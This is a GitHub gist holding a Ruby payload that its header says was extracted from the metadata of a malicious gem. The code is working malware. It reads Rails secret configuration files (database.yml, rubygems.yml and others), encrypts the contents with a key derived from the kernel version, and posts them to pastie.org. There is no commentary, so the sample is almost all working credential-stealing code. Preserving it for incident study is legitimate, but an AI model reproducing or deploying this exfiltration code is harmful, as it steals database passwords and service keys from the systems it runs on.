/rubygems_payload.rb
Secret
Last active Feb 17, 2016
| # extracted and prettified from the exploit gem metadata (https://gist.github.com/d891e876c53e55bf0920) | |
| # context: https://news.ycombinator.com/item?id=5139720 | |
| require 'net/http' | |
| require 'digest' | |
| require 'openssl' | |
| require 'base64' | |
| aes = proc { |text| | |
| aes_256 = OpenSSL::Cipher.new('aes-256-cbc') | |
| aes_256.encrypt | |
| aes_256.key = Digest::MD5.hexdigest(`uname -r`) | |
| crypted = aes_256.update(text) | |
| crypted << aes_256.final | |
| Base64.encode64(crypted) | |
| } | |
| exfil = proc { |path| | |
| if File.file?(path) == true | |
| "::: #{path} :::\n\n#{File.read(path)}" | |
| end | |
| } | |
| loot = ["config/database.yml", "config/librato.yml", "config/newrelic.yml", "config/rubygems.yml"].map { |path| exfil.call(path) }.join | |
| if !(loot.empty?) | |
| Net::HTTP.post_form(URI('http://pastie.org/pastes'), { | |
| 'paste[authorization]' => 'burger', | |
| 'paste[access_key]' => '', | |
| 'paste[parse_id]' => '6', | |
| 'paste[body]' => "e193256c9337b50b197f040e762dafcc745a66297c9db47ac30395d8022f94a8\n\n#{aes.call(loot)}", | |
| 'paste[restricted]' => '0', | |
| 'commit' => 'Create Paste' | |
| }) | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment